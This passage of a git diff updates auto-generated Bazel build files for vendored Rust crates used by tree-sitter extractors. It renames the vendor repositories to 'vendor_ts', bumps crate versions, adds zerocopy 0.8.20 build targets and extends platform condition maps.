crate_name = "build_script_build", + crate_root = "build.rs", + data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + edition = "2021", + 
pkg_name = "zerocopy", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=zerocopy", + "manual", + "noclippy", + "norustfmt", + ], + version = "0.8.20", + visibility = ["//visibility:private"], +) + +alias( + name = "build_script_build", + actual = ":_bs", + tags = ["manual"], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel index b457d85d3503..a3bb7ebae970 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel @@ -81,8 +81,8 @@ rust_proc_macro( }), version = "0.7.35", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel new file mode 100644 index 000000000000..0f6480931fcb --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel 
@@ -0,0 +1,88 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_proc_macro") + +package(default_visibility = ["//visibility:public"]) + +rust_proc_macro( + name = "zerocopy_derive", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=zerocopy-derive", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + 
"@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.8.20", + deps = [ + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl b/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl index 932b9ce66d0b..6d6d80ef58ce 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl 
@@ -22,11 +22,11 @@ def crate_repositories(): """ maybe( crates_vendor_remote_repository, - name = "vendor", + name = "vendor_ts", build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.bazel"), defs_module = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:defs.bzl"), ) - direct_deps = [struct(repo = "vendor", is_dev_dep = False)] + direct_deps = [struct(repo = "vendor_ts", is_dev_dep = False)] direct_deps.extend(_crate_repositories()) return direct_deps diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl b/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl index bd5fbaf27ae0..ff89ab88d59e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl 
@@ -296,89 +296,89 @@ def aliases( _NORMAL_DEPENDENCIES = { "ruby/extractor": { _COMMON_CONDITION: { - "clap": Label("@vendor__clap-4.5.26//:clap"), - "encoding": Label("@vendor__encoding-0.2.33//:encoding"), - "lazy_static": Label("@vendor__lazy_static-1.5.0//:lazy_static"), - "rayon": Label("@vendor__rayon-1.10.0//:rayon"), - "regex": Label("@vendor__regex-1.11.1//:regex"), - "tracing": Label("@vendor__tracing-0.1.41//:tracing"), - "tracing-subscriber": Label("@vendor__tracing-subscriber-0.3.19//:tracing_subscriber"), - "tree-sitter": Label("@vendor__tree-sitter-0.24.6//:tree_sitter"), - "tree-sitter-embedded-template": Label("@vendor__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template"), - "tree-sitter-ruby": Label("@vendor__tree-sitter-ruby-0.23.1//:tree_sitter_ruby"), + "clap": Label("@vendor_ts__clap-4.5.31//:clap"), + "encoding": Label("@vendor_ts__encoding-0.2.33//:encoding"), + "lazy_static": Label("@vendor_ts__lazy_static-1.5.0//:lazy_static"), + "rayon": Label("@vendor_ts__rayon-1.10.0//:rayon"), + "regex": Label("@vendor_ts__regex-1.11.1//:regex"), + "tracing": Label("@vendor_ts__tracing-0.1.41//:tracing"), + "tracing-subscriber": Label("@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber"), + "tree-sitter": Label("@vendor_ts__tree-sitter-0.24.6//:tree_sitter"), + "tree-sitter-embedded-template": Label("@vendor_ts__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template"), + "tree-sitter-ruby": Label("@vendor_ts__tree-sitter-ruby-0.23.1//:tree_sitter_ruby"), }, }, "rust/ast-generator": { _COMMON_CONDITION: { - "anyhow": Label("@vendor__anyhow-1.0.95//:anyhow"), - "either": Label("@vendor__either-1.13.0//:either"), - "itertools": Label("@vendor__itertools-0.14.0//:itertools"), - "mustache": Label("@vendor__mustache-0.9.0//:mustache"), - "proc-macro2": Label("@vendor__proc-macro2-1.0.93//:proc_macro2"), - "quote": Label("@vendor__quote-1.0.38//:quote"), - "serde": Label("@vendor__serde-1.0.217//:serde"), - "stdx": 
Label("@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx"), - "ungrammar": Label("@vendor__ungrammar-1.16.1//:ungrammar"), + "anyhow": Label("@vendor_ts__anyhow-1.0.96//:anyhow"), + "either": Label("@vendor_ts__either-1.14.0//:either"), + "itertools": Label("@vendor_ts__itertools-0.14.0//:itertools"), + "mustache": Label("@vendor_ts__mustache-0.9.0//:mustache"), + "proc-macro2": Label("@vendor_ts__proc-macro2-1.0.93//:proc_macro2"), + "quote": Label("@vendor_ts__quote-1.0.38//:quote"), + "serde": Label("@vendor_ts__serde-1.0.218//:serde"), + "stdx": Label("@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx"), + "ungrammar": Label("@vendor_ts__ungrammar-1.16.1//:ungrammar"), }, }, "rust/autobuild": { }, "rust/extractor": { _COMMON_CONDITION: { - "anyhow": Label("@vendor__anyhow-1.0.95//:anyhow"), - "argfile": Label("@vendor__argfile-0.2.1//:argfile"), - "chrono": Label("@vendor__chrono-0.4.39//:chrono"), - "clap": Label("@vendor__clap-4.5.26//:clap"), - "dunce": Label("@vendor__dunce-1.0.5//:dunce"), - "figment": Label("@vendor__figment-0.10.19//:figment"), - "glob": Label("@vendor__glob-0.3.2//:glob"), - "itertools": Label("@vendor__itertools-0.14.0//:itertools"), - "num-traits": Label("@vendor__num-traits-0.2.19//:num_traits"), - "ra_ap_base_db": Label("@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db"), - "ra_ap_cfg": Label("@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg"), - "ra_ap_hir": Label("@vendor__ra_ap_hir-0.0.258//:ra_ap_hir"), - "ra_ap_hir_def": Label("@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def"), - "ra_ap_hir_expand": Label("@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand"), - "ra_ap_ide_db": Label("@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db"), - "ra_ap_intern": Label("@vendor__ra_ap_intern-0.0.258//:ra_ap_intern"), - "ra_ap_load-cargo": Label("@vendor__ra_ap_load-cargo-0.0.258//:ra_ap_load_cargo"), - "ra_ap_parser": Label("@vendor__ra_ap_parser-0.0.258//:ra_ap_parser"), - "ra_ap_paths": Label("@vendor__ra_ap_paths-0.0.258//:ra_ap_paths"), - "ra_ap_project_model": 
Label("@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model"), - "ra_ap_span": Label("@vendor__ra_ap_span-0.0.258//:ra_ap_span"), - "ra_ap_syntax": Label("@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax"), - "ra_ap_vfs": Label("@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs"), - "serde": Label("@vendor__serde-1.0.217//:serde"), - "serde_json": Label("@vendor__serde_json-1.0.135//:serde_json"), - "serde_with": Label("@vendor__serde_with-3.12.0//:serde_with"), - "toml": Label("@vendor__toml-0.8.19//:toml"), - "tracing": Label("@vendor__tracing-0.1.41//:tracing"), - "tracing-flame": Label("@vendor__tracing-flame-0.2.0//:tracing_flame"), - "tracing-subscriber": Label("@vendor__tracing-subscriber-0.3.19//:tracing_subscriber"), - "triomphe": Label("@vendor__triomphe-0.1.14//:triomphe"), + "anyhow": Label("@vendor_ts__anyhow-1.0.96//:anyhow"), + "argfile": Label("@vendor_ts__argfile-0.2.1//:argfile"), + "chrono": Label("@vendor_ts__chrono-0.4.39//:chrono"), + "clap": Label("@vendor_ts__clap-4.5.31//:clap"), + "dunce": Label("@vendor_ts__dunce-1.0.5//:dunce"), + "figment": Label("@vendor_ts__figment-0.10.19//:figment"), + "glob": Label("@vendor_ts__glob-0.3.2//:glob"), + "itertools": Label("@vendor_ts__itertools-0.14.0//:itertools"), + "num-traits": Label("@vendor_ts__num-traits-0.2.19//:num_traits"), + "ra_ap_base_db": Label("@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db"), + "ra_ap_cfg": Label("@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg"), + "ra_ap_hir": Label("@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir"), + "ra_ap_hir_def": Label("@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def"), + "ra_ap_hir_expand": Label("@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand"), + "ra_ap_ide_db": Label("@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db"), + "ra_ap_intern": Label("@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern"), + "ra_ap_load-cargo": Label("@vendor_ts__ra_ap_load-cargo-0.0.266//:ra_ap_load_cargo"), + "ra_ap_parser": 
Label("@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser"), + "ra_ap_paths": Label("@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths"), + "ra_ap_project_model": Label("@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model"), + "ra_ap_span": Label("@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span"), + "ra_ap_syntax": Label("@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax"), + "ra_ap_vfs": Label("@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs"), + "serde": Label("@vendor_ts__serde-1.0.218//:serde"), + "serde_json": Label("@vendor_ts__serde_json-1.0.139//:serde_json"), + "serde_with": Label("@vendor_ts__serde_with-3.12.0//:serde_with"), + "toml": Label("@vendor_ts__toml-0.8.20//:toml"), + "tracing": Label("@vendor_ts__tracing-0.1.41//:tracing"), + "tracing-flame": Label("@vendor_ts__tracing-flame-0.2.0//:tracing_flame"), + "tracing-subscriber": Label("@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber"), + "triomphe": Label("@vendor_ts__triomphe-0.1.14//:triomphe"), }, }, "rust/extractor/macros": { _COMMON_CONDITION: { - "quote": Label("@vendor__quote-1.0.38//:quote"), - "syn": Label("@vendor__syn-2.0.96//:syn"), + "quote": Label("@vendor_ts__quote-1.0.38//:quote"), + "syn": Label("@vendor_ts__syn-2.0.98//:syn"), }, }, "shared/tree-sitter-extractor": { _COMMON_CONDITION: { - "chrono": Label("@vendor__chrono-0.4.39//:chrono"), - "encoding": Label("@vendor__encoding-0.2.33//:encoding"), - "flate2": Label("@vendor__flate2-1.0.35//:flate2"), - "globset": Label("@vendor__globset-0.4.15//:globset"), - "lazy_static": Label("@vendor__lazy_static-1.5.0//:lazy_static"), - "num_cpus": Label("@vendor__num_cpus-1.16.0//:num_cpus"), - "rayon": Label("@vendor__rayon-1.10.0//:rayon"), - "regex": Label("@vendor__regex-1.11.1//:regex"), - "serde": Label("@vendor__serde-1.0.217//:serde"), - "serde_json": Label("@vendor__serde_json-1.0.135//:serde_json"), - "tracing": Label("@vendor__tracing-0.1.41//:tracing"), - "tracing-subscriber": 
Label("@vendor__tracing-subscriber-0.3.19//:tracing_subscriber"), - "tree-sitter": Label("@vendor__tree-sitter-0.24.6//:tree_sitter"), + "chrono": Label("@vendor_ts__chrono-0.4.39//:chrono"), + "encoding": Label("@vendor_ts__encoding-0.2.33//:encoding"), + "flate2": Label("@vendor_ts__flate2-1.1.0//:flate2"), + "globset": Label("@vendor_ts__globset-0.4.15//:globset"), + "lazy_static": Label("@vendor_ts__lazy_static-1.5.0//:lazy_static"), + "num_cpus": Label("@vendor_ts__num_cpus-1.16.0//:num_cpus"), + "rayon": Label("@vendor_ts__rayon-1.10.0//:rayon"), + "regex": Label("@vendor_ts__regex-1.11.1//:regex"), + "serde": Label("@vendor_ts__serde-1.0.218//:serde"), + "serde_json": Label("@vendor_ts__serde_json-1.0.139//:serde_json"), + "tracing": Label("@vendor_ts__tracing-0.1.41//:tracing"), + "tracing-subscriber": Label("@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber"), + "tree-sitter": Label("@vendor_ts__tree-sitter-0.24.6//:tree_sitter"), }, }, } @@ -390,7 +390,7 @@ _NORMAL_ALIASES = { }, "rust/ast-generator": { _COMMON_CONDITION: { - Label("@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx"): "stdx", + Label("@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx"): "stdx", }, }, "rust/autobuild": { @@ -422,9 +422,9 @@ _NORMAL_DEV_DEPENDENCIES = { }, "shared/tree-sitter-extractor": { _COMMON_CONDITION: { - "rand": Label("@vendor__rand-0.8.5//:rand"), - "tree-sitter-json": Label("@vendor__tree-sitter-json-0.24.8//:tree_sitter_json"), - "tree-sitter-ql": Label("@vendor__tree-sitter-ql-0.23.1//:tree_sitter_ql"), + "rand": Label("@vendor_ts__rand-0.9.0//:rand"), + "tree-sitter-json": Label("@vendor_ts__tree-sitter-json-0.24.8//:tree_sitter_json"), + "tree-sitter-ql": Label("@vendor_ts__tree-sitter-ql-0.23.1//:tree_sitter_ql"), }, }, } 
@@ -584,16 +584,24 @@ _CONDITIONS = { "armv7-linux-androideabi": ["@rules_rust//rust/platform:armv7-linux-androideabi"], "armv7-unknown-linux-gnueabi": ["@rules_rust//rust/platform:armv7-unknown-linux-gnueabi"], "cfg(all(any(target_arch = \"x86_64\", target_arch = \"arm64ec\"), target_env = \"msvc\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:x86_64-pc-windows-msvc"], + "cfg(all(any(target_os = \"linux\", target_os = \"android\"), not(any(getrandom_backend = \"custom\", getrandom_backend = \"rdrand\", getrandom_backend = \"rndr\"))))": ["@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(all(target_arch = \"aarch64\", target_env = \"msvc\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:aarch64-pc-windows-msvc"], "cfg(all(target_arch = \"wasm32\", target_os = \"unknown\"))": ["@rules_rust//rust/platform:wasm32-unknown-unknown"], + "cfg(all(target_arch = \"wasm32\", target_os = \"wasi\", target_env = \"p2\"))": [], "cfg(all(target_arch = \"x86\", target_env = \"gnu\", not(target_abi = \"llvm\"), not(windows_raw_dylib)))": ["@rules_rust//rust/platform:i686-unknown-linux-gnu"], "cfg(all(target_arch = \"x86\", target_env = \"gnu\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:i686-unknown-linux-gnu"], "cfg(all(target_arch = \"x86\", target_env = \"msvc\", not(windows_raw_dylib)))": 
["@rules_rust//rust/platform:i686-pc-windows-msvc"], "cfg(all(target_arch = \"x86_64\", target_env = \"gnu\", not(target_abi = \"llvm\"), not(windows_raw_dylib)))": ["@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(all(target_arch = \"x86_64\", target_env = \"msvc\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:x86_64-pc-windows-msvc"], - "cfg(any(target_os = \"freebsd\", target_os = \"openbsd\", target_os = \"netbsd\", target_os = \"dragonflybsd\"))": ["@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-freebsd"], + "cfg(all(windows, not(target_vendor = \"win7\")))": ["@rules_rust//rust/platform:aarch64-pc-windows-msvc", "@rules_rust//rust/platform:i686-pc-windows-msvc", "@rules_rust//rust/platform:x86_64-pc-windows-msvc"], + "cfg(any())": [], + "cfg(any(target_os = \"dragonfly\", target_os = \"freebsd\", target_os = \"hurd\", target_os = \"illumos\", all(target_os = \"horizon\", target_arch = \"arm\")))": ["@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-freebsd"], + "cfg(any(target_os = \"freebsd\", target_os = \"openbsd\", target_os = \"netbsd\", target_os = \"dragonflybsd\", target_os = \"ios\"))": ["@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:x86_64-apple-ios", "@rules_rust//rust/platform:x86_64-unknown-freebsd"], + "cfg(any(target_os = \"haiku\", target_os = \"redox\", target_os = \"nto\", target_os = \"aix\"))": ["@rules_rust//rust/platform:aarch64-unknown-nto-qnx710"], + "cfg(any(target_os = \"ios\", target_os = \"visionos\", target_os = \"watchos\", target_os = \"tvos\"))": ["@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:x86_64-apple-ios"], "cfg(any(target_os = \"linux\", target_os 
= \"android\"))": ["@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(any(target_os = \"macos\", target_os = \"ios\"))": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-ios"], + "cfg(any(target_os = \"macos\", target_os = \"openbsd\", target_os = \"vita\", target_os = \"emscripten\"))": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-darwin"], "cfg(any(target_pointer_width = \"8\", target_pointer_width = \"16\", target_pointer_width = \"32\"))": ["@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-pc-windows-msvc", "@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:riscv32imc-unknown-none-elf", 
"@rules_rust//rust/platform:thumbv7em-none-eabi", "@rules_rust//rust/platform:thumbv8m.main-none-eabi", "@rules_rust//rust/platform:wasm32-unknown-unknown", "@rules_rust//rust/platform:wasm32-wasip1"], "cfg(not(windows))": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-fuchsia", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710", "@rules_rust//rust/platform:aarch64-unknown-uefi", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:riscv32imc-unknown-none-elf", "@rules_rust//rust/platform:riscv64gc-unknown-none-elf", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:thumbv7em-none-eabi", "@rules_rust//rust/platform:thumbv8m.main-none-eabi", "@rules_rust//rust/platform:wasm32-unknown-unknown", "@rules_rust//rust/platform:wasm32-wasip1", "@rules_rust//rust/platform:x86_64-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-ios", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-fuchsia", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu", "@rules_rust//rust/platform:x86_64-unknown-none", "@rules_rust//rust/platform:x86_64-unknown-uefi"], "cfg(target_os = \"android\")": 
["@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:x86_64-linux-android"], 
@@ -601,7 +609,10 @@ _CONDITIONS = { "cfg(target_os = \"hermit\")": [], "cfg(target_os = \"linux\")": ["@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(target_os = \"macos\")": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-darwin"], + "cfg(target_os = \"netbsd\")": [], "cfg(target_os = \"redox\")": [], + "cfg(target_os = \"solaris\")": [], + "cfg(target_os = \"vxworks\")": [], "cfg(target_os = \"wasi\")": ["@rules_rust//rust/platform:wasm32-wasip1"], "cfg(target_os = \"windows\")": ["@rules_rust//rust/platform:aarch64-pc-windows-msvc", "@rules_rust//rust/platform:i686-pc-windows-msvc", "@rules_rust//rust/platform:x86_64-pc-windows-msvc"], "cfg(unix)": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-fuchsia", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-freebsd", 
"@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-ios", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-fuchsia", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], @@ -645,7 +656,7 @@ def crate_repositories(): """ maybe( http_archive, - name = "vendor__adler2-2.0.0", + name = "vendor_ts__adler2-2.0.0", sha256 = "512761e0bb2578dd7380c6baaa0f4ce03e84f95e960231d1dec8bf4d7d6e2627", type = "tar.gz", urls = ["https://static.crates.io/crates/adler2/2.0.0/download"], @@ -655,7 +666,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__aho-corasick-1.1.3", + name = "vendor_ts__aho-corasick-1.1.3", sha256 = "8e60d3430d3a69478ad0993f19238d2df97c507009a52b3c10addcd7f6bcb916", type = "tar.gz", urls = ["https://static.crates.io/crates/aho-corasick/1.1.3/download"], @@ -665,7 +676,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__always-assert-0.2.0", + name = "vendor_ts__always-assert-0.2.0", sha256 = "a1078fa1ce1e34b1872d8611ad921196d76bdd7027e949fbe31231abde201892", type = "tar.gz", urls = ["https://static.crates.io/crates/always-assert/0.2.0/download"], @@ -675,7 +686,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__android-tzdata-0.1.1", + name = "vendor_ts__android-tzdata-0.1.1", sha256 = "e999941b234f3131b00bc13c22d06e8c5ff726d1b6318ac7eb276997bbb4fef0", type = "tar.gz", urls = 